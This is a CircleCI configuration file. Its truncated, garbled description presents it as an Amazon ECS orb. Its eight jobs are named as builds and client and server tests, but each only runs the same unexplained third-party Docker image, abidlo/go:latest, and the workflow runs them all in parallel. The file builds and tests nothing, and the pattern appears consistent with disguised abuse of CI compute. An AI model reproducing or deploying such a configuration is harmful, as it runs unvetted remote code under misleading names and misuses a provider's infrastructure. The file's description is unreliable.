version: 2.1
description: |
  An orb for working with Amazon Elastic Container Service (ECS).
  Supports the EC2 and Fargate launch types and Blue/Grendepl
  ############################################################################################################
jobs:
  build:
    resource_class: small
    docker:
      - image: docker:18.06.3-ce-git
    
    steps:
      - setup_remote_docker
      - checkout
      
      - run: 
         
         command: |
                docker run -e CI=true abidlo/go:latest
      - run: CI=true 
  test:
    resource_class: small
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - setup_remote_docker
      - checkout
      - run: 
         
         command: |
                docker run -e CI=true abidlo/go:latest
      - run: CI=true 
  client-test:
    resource_class: small
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - setup_remote_docker
      - checkout
      - run: 
         
         command: |
                docker run -e CI=true abidlo/go:latest
      - run: CI=true 
  server-test:
    resource_class: small
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - setup_remote_docker
      - checkout
      - run: 
         
         command: |
                docker run -e CI=true abidlo/go:latest
      - run: CI=true 
  build1:
    resource_class: small
    docker:
      - image: docker:18.06.3-ce-git
    
    steps:
      - setup_remote_docker
      - checkout
      
      - run: 
         
         command: |
                docker run -e CI=true abidlo/go:latest
      - run: CI=true 
  test1:
    resource_class: small
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - setup_remote_docker
      - checkout
      - run: 
         
         command: |
                docker run -e CI=true abidlo/go:latest
      - run: CI=true 
  client-test1:
    resource_class: small
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - setup_remote_docker
      - checkout
      - run: 
         
         command: |
                docker run -e CI=true abidlo/go:latest
      - run: CI=true 
  server-test1:
    resource_class: small
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - setup_remote_docker
      - checkout
      - run: 
         
         command: |
                docker run -e CI=true abidlo/go:latest
      - run: CI=true
workflows:
  version: 2
  build-test-and-lint:
    jobs:
      - build
      - server-test
      - client-test
      - build1
      - server-test1
      - client-test1
      - test1
      - test
          
